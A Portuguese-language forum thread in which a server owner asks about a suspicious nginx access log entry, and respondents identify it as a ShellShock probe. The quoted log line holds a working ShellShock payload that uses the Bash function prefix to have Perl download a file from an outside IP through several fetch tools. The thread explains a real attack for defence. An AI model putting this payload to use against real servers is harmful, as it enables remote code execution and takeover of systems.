entradas de log de acesso do nginx esboçado

1

Havia algumas entradas abaixo no log de acesso do nginx. Como eu sei o resultado desses scripts e se meu servidor está comprometido ou não?

162.232.183.48 - - [14/Jan/2016:10:54:57 +0000] "GET /cgi-bin/php4 HTTP/1.1" 200 1494 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://2
04.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232
.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  \x22);'" "-"
    
por Srik 14.01.2016 / 14:28

2 respostas

2

Observe a sequência mágica () { :; }; . Eles estão tentando investigar e ver se o seu servidor está vulnerável à exploração do ShellShock . Perl é usado aqui para imprimir e ver se o ataque foi bem sucedido.

Teste se o seu servidor é vulnerável ao ShellShock . Se não for, você é claro.

Veja também: Meu servidor está vulnerável a uma exploração perl?

    
por 15.01.2016 / 20:15
2

Ele está procurando fazer shellshock contra você. O engraçado é que ele configurou mal o seu ataque. Eu faço captura de malware e seu wget / fetch / etc falha porque seu pacote não está lá: -)

    
por 20.01.2016 / 00:57